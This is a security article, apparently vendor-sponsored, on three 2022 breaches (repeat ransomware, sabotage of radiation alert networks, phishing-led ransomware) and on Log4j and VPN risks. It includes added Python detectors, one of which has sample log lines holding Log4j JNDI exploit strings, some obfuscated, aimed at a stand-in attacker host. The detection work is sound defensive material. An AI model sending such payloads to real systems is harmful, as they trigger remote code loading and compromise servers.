Here are three of the worst breaches, attacker tactics and techniques of 2022, and the security controls that can provide effective enterprise security protection against them.
#1: 2 RaaS Attacks in 13 Months
Ransomware as a service is a type of attack in which the
ransomware software and infrastructure are leased out to the
attackers. These ransomware services can be purchased on the dark
web from other threat actors and ransomware gangs. Common
purchasing plans include buying the entire tool, using the existing
infrastructure while paying per infection, or letting other
attackers perform the service while sharing revenue with them.
In this attack, the threat actor was one of the most prevalent ransomware groups, one that specializes in gaining access via third parties, while the targeted company was a medium-sized retailer with dozens of sites in the United States.
The threat actors used ransomware as a service to breach the
victim’s network. They were able to exploit third-party credentials
to gain initial access, progress laterally, and ransom the company,
all within mere minutes.
The swiftness of this attack was unusual. In most RaaS cases, attackers stay in the network for weeks or months before demanding ransom. What is particularly interesting about this attack is that the company was ransomed in minutes, with no need for discovery or weeks of lateral movement.
A log investigation revealed that the attackers targeted servers that no longer existed on the network. As it turned out, the victim had been breached and ransomed 13 months before this second ransomware attack. The first attacker group then monetized that first attack not only through the ransom they obtained, but also by selling the company's network information to the second ransomware group.
In the 13 months between the two attacks, the victim changed its
network and removed servers, but the new attackers were not aware
of these architectural modifications. The scripts they developed
were designed for the previous network map. This also explains how
they were able to attack so quickly – they had plenty of
information about the network. The main lesson here is that
ransomware attacks can be repeated by different groups, especially
if the victim pays well.
“RaaS attacks such as this one are a good example of how full visibility allows for early alerting. A global, converged, cloud-native SASE platform[1] that supports all edges, like Cato Networks, provides complete network visibility into network events that are invisible to other providers or may go under the radar as benign events. And, being able to fully contextualize the events allows for early detection and remediation.”
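One concrete way to turn the observation above (attackers working from a stale network map) into an alert, as an added example that is not code from the article or from Cato Networks: the script compares the destination hosts in connection logs against an asset inventory and flags any source that probes several hosts that have already been retired. The inventory, log format, host names and IP addresses are all constructed for this illustration.

```python
"""Flag sources that connect to hosts that no longer exist.

Added example (not from the article): connection attempts aimed at
decommissioned servers are a strong signal that an intruder is working from
stale network information, as in the RaaS case described above.  The asset
inventory, log format and host names below are constructed for illustration.
"""
import re
from collections import defaultdict
from datetime import date

# Constructed asset inventory: hostname -> decommission date (None = still live).
INVENTORY = {
    "fileserv01": None,
    "fileserv02": date(2022, 3, 14),   # retired during the network redesign
    "dc01": None,
    "dc02-old": date(2021, 11, 2),
    "sql-legacy": date(2022, 1, 20),
}

# Constructed log lines in a simple "timestamp src -> dst[:port] verb" shape.
SAMPLE_LOG = """\
2023-01-08T02:14:03Z 10.20.5.44 -> fileserv01:445 connect
2023-01-08T02:14:04Z 10.20.5.44 -> fileserv02:445 connect
2023-01-08T02:14:04Z 10.20.5.44 -> dc02-old:389 connect
2023-01-08T02:14:05Z 10.20.5.44 -> sql-legacy:1433 connect
2023-01-08T02:14:06Z 10.20.5.44 -> dc01:389 connect
2023-01-08T09:30:11Z 10.20.7.12 -> fileserv01:445 connect
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+->\s+(?P<dst>[^:\s]+)(?::(?P<port>\d+))?\s+(?P<verb>\w+)$"
)


def parse_line(line):
    """Parse one log line into a dict of fields, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def classify_destination(host, inventory=INVENTORY):
    """Return 'live', 'decommissioned' or 'unknown' for a destination host."""
    if host not in inventory:
        return "unknown"
    return "live" if inventory[host] is None else "decommissioned"


def find_stale_target_sources(log_text, inventory=INVENTORY, threshold=2):
    """Group non-live destinations by source address and return every source
    that touched at least `threshold` distinct hosts that no longer exist.

    Returns a dict: src -> sorted list of decommissioned/unknown hosts.
    """
    hits = defaultdict(set)
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue            # skip lines that do not match the expected shape
        if classify_destination(rec["dst"], inventory) != "live":
            hits[rec["src"]].add(rec["dst"])
    return {src: sorted(hosts) for src, hosts in hits.items() if len(hosts) >= threshold}


if __name__ == "__main__":
    for src, hosts in find_stale_target_sources(SAMPLE_LOG).items():
        print(f"ALERT {src} probed {len(hosts)} retired hosts: {', '.join(hosts)}")
```

The threshold keeps a single typo'd hostname from paging anyone; a source that walks through several retired hosts in a couple of seconds is the pattern the log investigation in the article found.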
#2: The Critical Infrastructure Attack on Radiation Alert Networks
Attacks on critical infrastructure are becoming more common and more dangerous. Breaches of water supply plants, sewage systems and similar infrastructure could put millions of residents at risk of a humanitarian crisis. These infrastructures are also becoming more vulnerable, and OSINT-based attack surface management tools like Shodan and Censys make such vulnerabilities easy to find.
In 2021, two hackers were suspected of targeting radiation alert networks. Their attack relied on two insiders who worked for a third party. These insiders disabled the radiation alert systems, significantly debilitating their ability to monitor radiation attacks. The attackers were then able to delete critical software and disable radiation gauges (which are part of the infrastructure itself).
“Unfortunately, scanning for vulnerable systems in critical
infrastructure is easier than ever. While many such organizations
have multiple layers of security, they are still using point
solutions to try and defend their infrastructure rather than one
system that can look holistically at the full attack lifecycle.
Breaches are never just a phishing problem, or a credentials
problem, or a vulnerable system problem – they are always a
combination of multiple compromises performed by the threat actor,”
said Etay Maor, Sr. Director of Security Strategy at Cato Networks[2].
#3: The Three-Step Ransomware Attack That Started with Phishing
The third attack is also a ransomware attack. This time, it
consisted of three steps:
1. Infiltration – The attacker gained access to the network through a phishing attack. The victim clicked on a link that opened a connection to an external site, which resulted in the download of the payload.
2. Network activity – In the second phase, the attacker moved laterally through the network for two weeks. During this time, it collected admin passwords and used in-memory fileless malware. Then, on New Year's Eve, it performed the encryption. This date was chosen because it was (rightly) assumed the security team would be off on vacation.
3. Exfiltration – Finally, the attackers exfiltrated the data from the network.
In addition to these three main steps, additional sub-techniques were employed during the attack, and the victim's point security solutions were not able to block it.
“A multiple choke point approach, one that looks horizontally (so to speak) at the attack rather than as a set of vertical, disjointed issues, is the way to enhance detection, mitigation and prevention of such threats. Contrary to popular belief, the attacker needs to be right many times and the defenders only need to be right just once. The underlying technologies to implement a multiple choke point approach are full network visibility via a cloud-native backbone, and a single pass security stack that's based on ZTNA[3],” said Etay Maor, Sr. Director of Security Strategy at Cato Networks.
How Do Security Point Solutions Stack Up?
It is common for security professionals to succumb to the “single point of failure fallacy”. However, cyber-attacks are sophisticated events that rarely involve just one tactic or technique as the cause of the breach. Therefore, an all-encompassing outlook is required to successfully mitigate cyber-attacks. Security point solutions address single points of failure: these tools can identify individual risks, but they will not connect the dots between them, which can and has led to breaches.
Here’s What to Watch Out for in the Coming Months
Through its ongoing security research, the Cato Networks Security Team has identified two additional vulnerabilities and exploit attempts that it recommends including in your upcoming security plans:
1. Log4j
While the Log4j[4] vulnerability made its debut as early as December of 2021, the noise it's making hasn't died down. Attackers are still using Log4j to exploit systems, as not all organizations have been able to patch their Log4j vulnerabilities or to detect and block Log4j attacks at the network level instead, an approach known as “virtual patching”. They recommend prioritizing Log4j mitigation.
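As an added illustration (not the article's or Cato Networks' code) of what detecting Log4j attacks in traffic means in practice, the following script scans web access-log lines for the Log4j lookup syntax the exploit depends on, after undoing URL encoding and collapsing the simple nested lookups used to disguise it. The log lines and IP addresses are constructed, and the normalization only covers the lookup forms listed in the code, so it is a building block for the network-level detection described above rather than a complete one.

```python
"""Spot Log4j JNDI lookup strings in web access logs.

Added example (not from the article): the Log4j vulnerability is triggered by
a ``${jndi:...}`` lookup string landing in a logged field.  A network-level
detector therefore looks for that syntax in untrusted request fields, after
reversing the URL encoding and the simple ``${lower:x}`` / ``${::-x}``
wrappers that are commonly used to hide it.  All log lines are constructed.
"""
import re
from urllib.parse import unquote

# Constructed access-log lines (combined-log style, abbreviated).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2023:11:02:51 +0000] "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jan/2023:11:03:02 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.invalid/a}"
203.0.113.9 - - [10/Jan/2023:11:03:05 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}dap://attacker.invalid/a}"
203.0.113.11 - - [10/Jan/2023:11:04:00 +0000] "GET /search?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Fattacker.invalid%2Fb%7D HTTP/1.1" 404 "-" "curl/7.85"
203.0.113.5 - - [10/Jan/2023:11:05:10 +0000] "GET /price?x=${12} HTTP/1.1" 200 "-" "Mozilla/5.0"
"""

# Two wrapper shapes that evaluate to their inner text:
#   ${lower:x} / ${upper:x}     -> x (case folded at the end)
#   ${anything:-x}, e.g. ${::-x} -> x (the "default value" form)
_SIMPLE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}")

# The lookup that the exploit needs to reach a JNDI provider.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _unwrap(m):
    """Replace one matched wrapper with its inner text."""
    return m.group(1) if m.group(1) is not None else m.group(2)


def normalize(s, max_rounds=10):
    """URL-decode, then repeatedly collapse simple wrappers so that a nested
    ``${${lower:j}ndi:...}`` becomes a plain ``${jndi:...}``.  Bounded rounds
    keep pathological inputs from looping for long."""
    s = unquote(s)
    for _ in range(max_rounds):
        new = _SIMPLE_LOOKUP.sub(_unwrap, s)
        if new == s:
            break
        s = new
    return s.lower()


def is_log4j_probe(line):
    """True if the line contains a JNDI lookup after normalization."""
    return JNDI_RE.search(normalize(line)) is not None


def scan(log_text):
    """Return the source address of every log line that carries a lookup."""
    hits = []
    for line in log_text.splitlines():
        if is_log4j_probe(line):
            hits.append(line.split(" ", 1)[0])
    return hits


if __name__ == "__main__":
    for src in scan(SAMPLE_LOG):
        print(f"Log4j lookup attempt from {src}")
```

The last sample line shows why the check targets the `jndi:` lookup specifically rather than any `${...}`: ordinary request parameters can legitimately contain braces, and alerting on all of them would produce exactly the false positives the article's "reliable information" pillar warns against.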
2. Misconfigured Firewalls and VPNs
Security solutions like firewalls and VPNs have become access points for attackers. Patching them has become increasingly difficult, especially as architectures move to the cloud and work goes remote. It is recommended to pay close attention to these components, as they are increasingly vulnerable.
How to Minimize Your Attack Surface and Gain Visibility into the Network
To reduce the attack surface, security professionals need visibility into their networks. Visibility relies on three pillars:
- Actionable information – that can be used to mitigate attacks
- Reliable information – that minimizes the number of false positives
- Timely information – to ensure mitigation happens before the attack has an impact
Once an organization has complete visibility into the activity on its network, it can contextualize the data, decide whether the activity witnessed should be allowed, denied, monitored, restricted (or any other action), and then enforce that decision. All of these elements must be applied to every entity, be it a user, device or cloud app, all the time and everywhere. That is what SASE is all about.
References
[1] cloud-native SASE platform (www.catonetworks.com)
[2] Cato Networks (www.catonetworks.com)
[3] based on ZTNA (www.catonetworks.com)
[4] Log4j (www.catonetworks.com)
[5] Twitter (twitter.com)
[6] LinkedIn (www.linkedin.com)
Read more https://thehackernews.com/2023/02/3-overlooked-cybersecurity-breaches.html